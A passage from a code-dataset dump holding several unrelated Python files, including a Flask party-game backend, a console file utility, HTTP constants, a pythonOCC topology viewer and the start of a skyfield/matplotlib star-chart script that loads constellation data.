other_associated_user_id,\n 'other_suffix' : other_suffix,\n 'amount' : amount,\n 'description' : description},\n context_instance=RequestContext(request))\n\n","sub_path":"tahua/admin_interface/views/enter_transaction.py","file_name":"enter_transaction.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"244921519","text":"\nimport time\n\nprint(\"1 to view a single file\\n\"\n \"2 to create file\\n\"\n\t\"3 to copy file data'\\n'\"\n\t\"4 to view multiples files data in a single command\")\ncomm=input()\nif comm == '1':\n\tf_name=input(\"enter a file name\")\n\tf=open(f_name,'r')\n\tprint(f.read())\nelif comm =='2':\n\tf_name=input(\"enter a file name\")\n\tf=open(f_name,'w')\n\tdata=input(\"enter data without pressing enter\")\n\tf.write(data)\nelif comm=='3':\n\tf_name=input(\"enter a file name whose content to be copied\")\n\tf=open(f_name,'r')\n\tdata=f.read()\n\tf_name1=input(\"enter a file name in which data to be copied\")\n\tf=open(f_name1,'a+')\n\tprint('\\n')\n\tf.write(data)\n\tf.seek(0)\n\tprint('\\n')\n\tprint(f.read())\nelif comm=='4':\n\tno=int(input(\"enter no. of files you want to view data\"))\n\tli=[]\n\tfor i in range(no):\n\t\tli1=input(\"enter file name\")\n\t\tli.append(li1) #error line\n\tprint(li)\n\tfor i in li:\n\t\tf=open(i,'r')\n\t\tprint('\\n')\n\t\tprint(f.read())\n\t\ttime.sleep(1)\t\n","sub_path":"program6.py","file_name":"program6.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"35283353","text":"# API constants\n\n# API response\nJSON = 'application/json'\nTYPE_ERROR = 'Type of parameter \\'{}\\' is invalid'\n\n# HTTP Verbs\nV_POST = 'POST'\nV_GET = 'GET'\nV_PUT = 'PUT'\nV_PATCH = 'PATCH'\nV_DELETE = 'DELETE'\n\nALL = [\n V_POST, V_GET, V_PUT, V_PATCH, V_DELETE\n]\nVIEW = [\n V_GET\n]\nEDIT = [\n V_POST, V_PUT, V_PATCH\n]\nDELETE = [\n V_DELETE\n]\n\n# HTTP Status code\nOK = 200\nCREATED = 201\nNOT_FOUND = 404\nMETHOD_NOT_ALLOWED = 405\nCONFLICT = 409\nI_M_A_TEAPOT = 418\n\n","sub_path":"app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611779240","text":"from app import app\nfrom flask import render_template, request, session, jsonify\nfrom util.error_messages import error_enum\nfrom util.util import *\nfrom util.control import *\nimport json\n\n@app.route(\"/check_join_status\", methods=[\"GET\"])\ndef check_join_status_ajax():\n join_status = {}\n if not \"uid\" in session:\n join_status[\"success\"] = \"False\"\n return json.dumps(join_status)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n join_status[\"success\"] = \"False\"\n return json.dumps(join_status)\n count = get_player_count(access_code)\n game_setup = get_game_by_access_code(access_code)\n join_status[\"success\"] = \"True\"\n join_status[\"player_count\"] = str(count)\n join_status[\"total_player\"] = game_setup[\"total_player\"]\n join_status[\"total_killer\"] = game_setup[\"total_killer\"]\n return json.dumps(join_status)\n\n@app.route(\"/status_to_online\", methods=[\"GET\"])\ndef status_to_online_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n user_name = get_user_name_by_uid(str(session['uid']))\n status_to_online(access_code, user_name)\n ret[\"success\"] = \"True\"\n return jsonify(ret)\n\n@app.route(\"/wait_players_online\", methods=[\"GET\"])\ndef wait_players_online_ajax():\n online_status = {}\n if not \"uid\" in session:\n online_status[\"success\"] = \"False\"\n return json.dumps(online_status)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n online_status[\"success\"] = \"False\"\n return json.dumps(online_status)\n player_setup = get_player_setup(access_code)\n for ele in player_setup[\"players\"].keys():\n if player_setup[\"players\"][ele][\"status\"] == status[0]:\n online_status[\"success\"] = \"True\"\n online_status[\"ready\"] = \"False\"\n return json.dumps(online_status)\n online_status[\"success\"] = \"True\"\n online_status[\"ready\"] = \"True\"\n game_setup = get_game_by_access_code(access_code)\n if game_setup[\"stage\"] == stage[0]:\n allocate_character(access_code)\n return json.dumps(online_status)\n\n@app.route(\"/get_playing_page_info\", methods=[\"GET\"])\ndef get_playing_page_info_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n game_setup = get_game_by_access_code(access_code)\n player_setup = get_player_setup(access_code)\n user_name = get_user_name_by_uid(str(session['uid']))\n ret[\"start_with\"] = game_setup[\"start_with\"]\n ret[\"lead_killer\"] = player_setup[\"lead_killer\"]\n ret[\"user_name\"] = user_name\n ret[\"access_code\"] = access_code\n char_id = player_setup[\"players\"][user_name][\"character\"]\n if char_id == character[1]:\n ret[\"character\"] = \"Killer\"\n else:\n ret[\"character\"] = \"Civilian\"\n if char_id == character[1]:\n all_killers = get_all_killers(player_setup)\n ret[\"other_characters\"] = {\"All Killers in the game:\" : all_killers}\n ret[\"bunker\"] = game_setup[\"bunker\"]\n ret[\"stage\"] = game_setup[\"stage\"]\n ret[\"success\"] = \"True\"\n return json.dumps(ret)\n\n@app.route(\"/action\", methods=[\"POST\"])\ndef action_ajax():\n ret = {}\n if not \"uid\" in session:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n access_code = get_access_code_by_session(str(session['uid']))\n if access_code is None:\n ret[\"success\"] = \"False\"\n return json.dumps(ret)\n game_setup = get_game_by_access_code(access_code)\n user_name = get_user_name_by_uid(str(session['uid']))\n input_data = request.form.to_dict()\n stage = game_setup[\"stage\"]\n bunker = \"bunker_\" + stage\n update_data = {user_name : input_data[\"action\"]}\n update_bunker(access_code, bunker, update_data)\n bunker_data = get_bunker_by_access_code(access_code)\n if len(bunker_data[\"bunkers\"][bunker]) == int(game_setup[\"bunker\"][bunker][\"setup\"]):\n flag = False\n for key in bunker_data[\"bunkers\"][bunker]:\n if bunker_data[\"bunkers\"][bunker][key] == \"destroy\":\n flag = True\n game_stage_increase(access_code, flag)\n ret[\"success\"] = \"True\"\n return json.dumps(ret)\n","sub_path":"KBE/app/ajax_router.py","file_name":"ajax_router.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"308576230","text":"import tensorflow as tf\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', default=100, type=int, help='batch size')\nparser.add_argument('--train_steps', default=1000, type=int,\n help='number of training steps')\n\ndef main(argv):\n\tprint(\"main function\")\n\tprint(argv)\n\n\targs = parser.parse_args(argv[1:])\n\t# print(argv[1:])\n\tprint(args)\n\n\nif __name__ == '__main__':\n\ttf.app.run(main)","sub_path":"demo_basic/eg_01.py","file_name":"eg_01.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"486242054","text":"import sys\r\nimport time\r\nimport os\r\nfrom OCC.Core.BRep import BRep_Tool\r\nfrom OCC.Core.TopAbs import TopAbs_VERTEX\r\nfrom OCC.Core.TopoDS import TopoDS_Iterator, topods_Vertex\r\nfrom OCCUtils.Topology import shapeTypeString, dumpTopology\r\nfrom PyQt5.QtWidgets import QApplication, qApp\r\nfrom PyQt5.QtWidgets import QDialog, QCheckBox\r\n\r\n\r\nclass Viewer (object):\r\n\r\n def __init__(self):\r\n from OCC.Display.qtDisplay import qtViewer3d\r\n self.app = self.get_app()\r\n self.wi = self.app.topLevelWidgets()[0]\r\n self.vi = self.wi.findChild(qtViewer3d, \"qt_viewer_3d\")\r\n\r\n def get_app(self):\r\n app = QApplication.instance()\r\n #app = qApp\r\n # checks if QApplication already exists\r\n if not app:\r\n app = QApplication(sys.argv)\r\n return app\r\n\r\n def on_select(self):\r\n self.vi.sig_topods_selected.connect(self._on_select)\r\n\r\n def _on_select(self, shapes):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n shape : TopoDS_Shape\r\n \"\"\"\r\n for shape in shapes:\r\n self.DumpTop(shape)\r\n\r\n def DumpTop(self, shape, level=0):\r\n \"\"\"\r\n Print the details of an object from the top down\r\n \"\"\"\r\n brt = BRep_Tool()\r\n s = shape.ShapeType()\r\n if s == TopAbs_VERTEX:\r\n pnt = brt.Pnt(topods_Vertex(shape))\r\n dmp = \" \" * level\r\n dmp += \"%s - \" % shapeTypeString(shape)\r\n dmp += \"%.5e %.5e %.5e\" % (pnt.X(), pnt.Y(), pnt.Z())\r\n print(dmp)\r\n else:\r\n dmp = \" \" * level\r\n dmp += shapeTypeString(shape)\r\n print(dmp)\r\n it = TopoDS_Iterator(shape)\r\n while it.More():\r\n shp = it.Value()\r\n it.Next()\r\n self.DumpTop(shp, level + 1)\r\n","sub_path":"src/pyocc/OCCQt.py","file_name":"OCCQt.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"107885376","text":"import time\r\nfrom urllib.request import urlretrieve, urlopen\r\nfrom urllib.error import HTTPError\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import font_manager\r\nfrom matplotlib import collections as mc\r\nimport pylab as pl\r\nimport pandas\r\nimport numpy\r\nimport math\r\nfrom skyfield import almanac\r\nfrom skyfield.api import load, Topos\r\nfrom pytz import timezone, common_timezones\r\nfrom datetime import date, datetime\r\nfrom matplotlib.figure import Figure\r\nimport pathlib\r\nfrom PIL import Image\r\nimport itertools\r\n\r\n#####################################\r\n# ephem setting\r\ntz = timezone('Asia/Hong_Kong')\r\n\r\nephem = load('de421.bsp') #1900-2050 only\r\n#ephem = load('de422.bsp') #-3000-3000 only\r\n#ephem = load('de430t.bsp') #1550-2650 only\r\nearth = ephem['earth']\r\nmars = ephem['mars']\r\n#####################################\r\n\r\n#####################################\r\n# location information\r\n#HKO\r\nTrig_0 = (Topos(str(22+18/60+7.3/3600)+' N', str(114+10/60+27.6/3600)+' E'),\\\r\n 22+18/60+7.3/3600,114+10/60+27.6/3600,'22:18:07.3','N','114:10:27.6','E')\r\n\r\n#Hokoon\r\nhokoon = (Topos(str(22+23/60+1/3600)+' N', str(114+6/60+29/3600)+' E'),\\\r\n 22+23/60+1/3600,114+6/60+29/3600,'22:23:01','N','114:06:29','E')\r\n\r\nObs = hokoon #<= set your observatory\r\n\r\nts = load.timescale()\r\n##date_UTC = ts.utc(ts.now().utc_datetime().replace(second=0,microsecond=0))\r\n##date_local = date_UTC.astimezone(tz)\r\n#####################################\r\n\r\nfig, ax0 = plt.subplots(figsize=(7.2*3,4.8*3), facecolor='black')\r\nfig.subplots_adjust(0,0,1,1)\r\nax0.set_facecolor('black')\r\nax0.set_aspect('equal')\r\nax0.set_xlim((-3,3))\r\nax0.set_ylim((-1,3))\r\n\r\nzenith_shift_ra = 0\r\nzenith_shift_dec = 0\r\nrotate_angle = 0\r\naspect_ratio = 1 #y/x\r\nplot_scale = 180/math.pi\r\nx_shift = 0\r\ny_shift = 0\r\n\r\nannotation_on = 1\r\n\r\nplot_alpha = 0.5\r\n\r\nhorizon_conic = [0] * 361\r\nhorizon_conic = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\nequator_conic = [0] * 361\r\nequator_conic = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\necliptic_conic = [0] * 361\r\necliptic_conic = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ngrid_dec = [0] * 361\r\ngrid_dec = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ngrid_ra = [0] * 361\r\ngrid_ra = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\ncircumpolar = [0] * 361\r\ncircumpolar = pandas.DataFrame(columns=['RA','Dec','x','y']).apply(pandas.to_numeric)\r\n\r\nAnd = numpy.zeros(shape=(178,5))\r\nAnd = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','And.csv'))\r\nAnt = numpy.zeros(shape=(48,5))\r\nAnt = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ant.csv'))\r\nAps = numpy.zeros(shape=(36,5))\r\nAps = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aps.csv'))\r\nAqr = numpy.zeros(shape=(171,5))\r\nAqr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aqr.csv'))\r\nAql = numpy.zeros(shape=(131,5))\r\nAql = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aql.csv'))\r\nAra = numpy.zeros(shape=(64,5))\r\nAra = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ara.csv'))\r\nAri = numpy.zeros(shape=(86,5))\r\nAri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ari.csv'))\r\nAur = numpy.zeros(shape=(161,5))\r\nAur = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Aur.csv'))\r\nBoo = numpy.zeros(shape=(154,5))\r\nBoo = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Boo.csv'))\r\nCae = numpy.zeros(shape=(21,5))\r\nCae = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cae.csv'))\r\nCam = numpy.zeros(shape=(158,5))\r\nCam = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cam.csv'))\r\nCnc = numpy.zeros(shape=(112,5))\r\nCnc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cnc.csv'))\r\nCVn = numpy.zeros(shape=(61,5))\r\nCVn = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CVn.csv'))\r\nCMa = numpy.zeros(shape=(155,5))\r\nCMa = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CMa.csv'))\r\nCMi = numpy.zeros(shape=(44,5))\r\nCMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CMi.csv'))\r\nCap = numpy.zeros(shape=(87,5))\r\nCap = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cap.csv'))\r\nCar = numpy.zeros(shape=(210,5))\r\nCar = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Car.csv'))\r\nCas = numpy.zeros(shape=(164,5))\r\nCas = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cas.csv'))\r\nCen = numpy.zeros(shape=(281,5))\r\nCen = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cen.csv'))\r\nCep = numpy.zeros(shape=(157,5))\r\nCep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cep.csv'))\r\nCet = numpy.zeros(shape=(177,5))\r\nCet = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cet.csv'))\r\nCha = numpy.zeros(shape=(34,5))\r\nCha = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cha.csv'))\r\nCir = numpy.zeros(shape=(34,5))\r\nCir = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cir.csv'))\r\nCol = numpy.zeros(shape=(78,5))\r\nCol = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Col.csv'))\r\nCom = numpy.zeros(shape=(71,5))\r\nCom = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Com.csv'))\r\nCrA = numpy.zeros(shape=(46,5))\r\nCrA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CrA.csv'))\r\nCrB = numpy.zeros(shape=(40,5))\r\nCrB = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','CrB.csv'))\r\nCrv = numpy.zeros(shape=(28,5))\r\nCrv = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Crv.csv'))\r\nCrt = numpy.zeros(shape=(33,5))\r\nCrt = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Crt.csv'))\r\nCru = numpy.zeros(shape=(48,5))\r\nCru = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cru.csv'))\r\nCyg = numpy.zeros(shape=(291,5))\r\nCyg = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Cyg.csv'))\r\nDel = numpy.zeros(shape=(47,5))\r\nDel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Del.csv'))\r\nDor = numpy.zeros(shape=(34,5))\r\nDor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Dor.csv'))\r\nDra = numpy.zeros(shape=(226,5))\r\nDra = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Dra.csv'))\r\nEqu = numpy.zeros(shape=(15,5))\r\nEqu = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Equ.csv'))\r\nEri = numpy.zeros(shape=(197,5))\r\nEri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Eri.csv'))\r\nFor = numpy.zeros(shape=(64,5))\r\nFor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','For.csv'))\r\nGem = numpy.zeros(shape=(123,5))\r\nGem = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Gem.csv'))\r\nGru = numpy.zeros(shape=(62,5))\r\nGru = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Gru.csv'))\r\nHer = numpy.zeros(shape=(263,5))\r\nHer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Her.csv'))\r\nHor = numpy.zeros(shape=(36,5))\r\nHor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hor.csv'))\r\nHya = numpy.zeros(shape=(246,5))\r\nHya = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hya.csv'))\r\nHyi = numpy.zeros(shape=(33,5))\r\nHyi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Hyi.csv'))\r\nInd = numpy.zeros(shape=(39,5))\r\nInd = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ind.csv'))\r\nLac = numpy.zeros(shape=(67,5))\r\nLac = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lac.csv'))\r\nLeo = numpy.zeros(shape=(130,5))\r\nLeo = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Leo.csv'))\r\nLMi = numpy.zeros(shape=(36,5))\r\nLMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','LMi.csv'))\r\nLep = numpy.zeros(shape=(76,5))\r\nLep = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lep.csv'))\r\nLib = numpy.zeros(shape=(86,5))\r\nLib = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lib.csv'))\r\nLup = numpy.zeros(shape=(117,5))\r\nLup = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lup.csv'))\r\nLyn = numpy.zeros(shape=(100,5))\r\nLyn = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lyn.csv'))\r\nLyr = numpy.zeros(shape=(83,5))\r\nLyr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Lyr.csv'))\r\nMen = numpy.zeros(shape=(26,5))\r\nMen = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Men.csv'))\r\nMic = numpy.zeros(shape=(39,5))\r\nMic = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mic.csv'))\r\nMon = numpy.zeros(shape=(153,5))\r\nMon = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mon.csv'))\r\nMus = numpy.zeros(shape=(59,5))\r\nMus = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Mus.csv'))\r\nNor = numpy.zeros(shape=(41,5))\r\nNor = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Nor.csv'))\r\nOct = numpy.zeros(shape=(67,5))\r\nOct = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Oct.csv'))\r\nOph = numpy.zeros(shape=(179,5))\r\nOph = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Oph.csv'))\r\nOri = numpy.zeros(shape=(225,5))\r\nOri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ori.csv'))\r\nPav = numpy.zeros(shape=(82,5))\r\nPav = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pav.csv'))\r\nPeg = numpy.zeros(shape=(176,5))\r\nPeg = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Peg.csv'))\r\nPer = numpy.zeros(shape=(160,5))\r\nPer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Per.csv'))\r\nPhe = numpy.zeros(shape=(70,5))\r\nPhe = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Phe.csv'))\r\nPic = numpy.zeros(shape=(50,5))\r\nPic = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pic.csv'))\r\nPsc = numpy.zeros(shape=(141,5))\r\nPsc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Psc.csv'))\r\nPsA = numpy.zeros(shape=(49,5))\r\nPsA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','PsA.csv'))\r\nPup = numpy.zeros(shape=(275,5))\r\nPup = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pup.csv'))\r\nPyx = numpy.zeros(shape=(48,5))\r\nPyx = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Pyx.csv'))\r\nRet = numpy.zeros(shape=(24,5))\r\nRet = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ret.csv'))\r\nSge = numpy.zeros(shape=(31,5))\r\nSge = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sge.csv'))\r\nSgr = numpy.zeros(shape=(219,5))\r\nSgr = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sgr.csv'))\r\nSco = numpy.zeros(shape=(174,5))\r\nSco = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sco.csv'))\r\nScl = numpy.zeros(shape=(59,5))\r\nScl = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Scl.csv'))\r\nSct = numpy.zeros(shape=(30,5))\r\nSct = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sct.csv'))\r\nSer = numpy.zeros(shape=(112,5))\r\nSer = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Ser.csv'))\r\nSex = numpy.zeros(shape=(40,5))\r\nSex = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Sex.csv'))\r\nTau = numpy.zeros(shape=(223,5))\r\nTau = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tau.csv'))\r\nTel = numpy.zeros(shape=(51,5))\r\nTel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tel.csv'))\r\nTri = numpy.zeros(shape=(26,5))\r\nTri = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tri.csv'))\r\nTrA = numpy.zeros(shape=(35,5))\r\nTrA = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','TrA.csv'))\r\nTuc = numpy.zeros(shape=(50,5))\r\nTuc = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Tuc.csv'))\r\nUMa = numpy.zeros(shape=(224,5))\r\nUMa = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','UMa.csv'))\r\nUMi = numpy.zeros(shape=(42,5))\r\nUMi = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','UMi.csv'))\r\nVel = numpy.zeros(shape=(193,5))\r\nVel = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vel.csv'))\r\nVir = numpy.zeros(shape=(174,5))\r\nVir = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vir.csv'))\r\nVol = numpy.zeros(shape=(33,5))\r\nVol = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vol.csv'))\r\nVul = numpy.zeros(shape=(77,5))\r\nVul = pandas.read_csv(pathlib.Path.cwd().joinpath('ASC','Vul.csv'))\r\n\r\nconstellation_list = [And,Ant,Aps,Aqr,Aql,Ara,Ari,Aur,Boo,Cae,Cam,Cnc,CVn,CMa,CMi,Cap,Car,Cas,Cen,Cep,\\\r\n Cet,Cha,Cir,Col,Com,CrA,CrB,Crv,Crt,Cru,Cyg,Del,Dor,Dra,Equ,Eri,For,Gem,Gru,Her,\\\r\n Hor,Hya,Hyi,Ind,Lac,Leo,LMi,Lep,Lib,Lup,Lyn,Lyr,Men,Mic,Mon,Mus,Nor,Oct,Oph,Ori,\\\r\n Pav,Peg,Per,Phe,Pic,Psc,PsA,Pup,Pyx,Ret,Sge,Sgr,Sco,Scl,Sct,Ser,Sex,Tau,Tel,Tri,\\\r\n TrA,Tuc,UMa,UMi,Vel,Vir,Vol,Vul]\r\n\r\nlabelxy = 0\r\n\r\nmag_lim = 8\r\n\r\nAnd_line = [[0,3],[1,3],[1,7],[1,9],[2,9],[3,13],[3,14],[5,10],[7,18],[8,14],[10,19],[11,18],[16,19],[13,16]]\r\nAnt_line = [[0,2],[0,3],[1,3]] \r\nAps_line = [[0,3],[1,2],[1,3]]\r\nAqr_line = [[0,1],[0,5],[1,6],[1,10],[2,8],[3,7],[3,18],[4,8],[4,9],[4,12],[6,17],[7,30],[9,17],[10,13],[11,12],\\\r\n [11,14],[14,31],[19,30],[19,31],[21,22]]\r\nAql_line = [[0,1],[0,4],[0,6],[2,4],[3,7],[4,5],[4,7]]\r\nAra_line = [[0,1],[0,2],[0,3],[2,6],[3,4]]\r\nAri_line = [[0,1],[0,2]]\r\nAur_line = [[0,1],[0,3],[0,4],[1,2],[4,5],[4,7]]\r\nBoo_line = [[0,1],[0,2],[0,6],[0,11],[2,4],[3,5],[3,6],[4,5]]\r\nCae_line = [[0,2]]\r\nCam_line = [[0,2],[0,4],[1,7],[2,7]]\r\nCnc_line = [[0,1],[1,2],[1,3]]\r\nCVn_line = [[0,1]]\r\nCMa_line = [[0,3],[0,6],[0,12],[0,13],[1,7],[2,6],[2,7],[2,8],[4,8],[12,13]]\r\nCMi_line = [[0,1]]\r\nCap_line = [[0,3],[0,4],[1,2],[1,7],[2,5],[3,9],[4,10],[5,9],[6,7],[6,10]]\r\nCar_line = [[0,10],[2,10],[2,14],[3,11],[3,14],[4,6],[4,15],[8,11],[8,13],[12,13],[12,15]]\r\nCas_line = [[0,1],[0,2],[2,3],[3,4]]\r\nCen_line = [[0,5],[1,5],[3,6],[3,7],[4,5],[4,8],[5,7],[6,12],[8,18],[11,18]]\r\nCep_line = [[0,2],[0,3],[0,4],[1,2],[1,5],[3,5],[3,6]]\r\nCet_line = [[0,3],[0,5],[0,6],[1,4],[1,18],[2,4],[2,8],[3,7],[4,25],[5,8],[7,8],[12,13],[12,18],[13,25]]\r\nCha_line = [[0,1]]\r\nCir_line = [[0,1],[0,2]]\r\nCol_line = [[0,1],[0,3],[1,4],[1,2]]\r\nCom_line = [[0,1],[0,19]]\r\nCrA_line = [[0,1],[0,6],[1,2],[2,4],[3,4],[5,6]]\r\nCrB_line = [[1,2],[1,3],[2,4],[3,6],[5,6],[5,10]]\r\nCrv_line = [[0,2],[0,3],[1,2],[1,3],[3,4]]\r\nCrt_line = [[0,1],[0,2],[0,6],[1,3],[2,3],[2,5],[4,6]]\r\nCru_line = [[0,4],[1,2]]\r\nCyg_line = [[0,1],[1,2],[1,3],[1,11],[2,5],[3,9],[4,11],[8,9]]\r\nDel_line = [[0,1],[0,2],[0,4],[1,3],[3,4]]\r\nDor_line = [[0,1],[0,2],[1,3]]\r\nDra_line = [[0,2],[0,8],[1,4],[1,5],[2,29],[3,8],[3,9],[4,6],[5,7],[6,9],[7,11],[8,29],[10,11]]\r\nEqu_line = [[0,2],[0,3],[1,2],[1,3]]\r\nEri_line = [[0,8],[1,24],[1,27],[2,4],[2,16],[3,18],[3,22],[4,9],[5,8],[5,21],[6,14],[6,19],[7,17],[7,23],[9,12],\\\r\n [10,14],[10,20],[12,30],[13,15],[13,16],[15,27],[17,30],[18,21],[19,22],[20,23]]\r\nFor_line = [[0,1],[1,7]]\r\nGem_line = [[0,8],[1,12],[3,5],[3,6],[4,5],[7,10],[8,10],[8,12],[9,13],[11,13]]\r\nGru_line = [[0,1],[0,2],[0,5],[1,3],[1,4],[4,5]]\r\nHer_line = [[0,1],[0,5],[0,8],[1,6],[1,14],[2,4],[2,14],[3,6],[3,12],[3,14],[4,7],[6,13],[7,10],[9,12],[10,11]]\r\nHor_line = [[0,3],[0,6],[0,9]]\r\nHya_line = [[0,11],[0,12],[1,4],[1,14],[2,5],[2,9],[3,6],[3,8],[4,18],[5,13],[5,17],[6,14],[7,8],[7,12],[9,11],\\\r\n [13,19],[15,17],[15,19]]\r\nHyi_line = [[0,2],[0,4],[1,5],[3,4],[3,5]]\r\nInd_line = [[0,2],[1,2]]\r\nLac_line = [[0,2],[0,3],[1,5],[2,4],[4,5]]\r\nLeo_line = [[0,5],[0,7],[0,8],[0,10],[1,2],[1,5],[2,17],[3,6],[3,8],[3,17],[4,11],[5,12],[6,11]]\r\nLMi_line = [[0,1],[1,2]]\r\nLep_line = [[0,1],[0,3],[0,4],[1,5],[1,12],[2,12],[3,8],[3,9],[4,6],[5,7],[9,10]]\r\nLib_line = [[0,1],[0,2],[0,5],[1,2],[2,3],[3,4],[5,6]]\r\nLup_line = 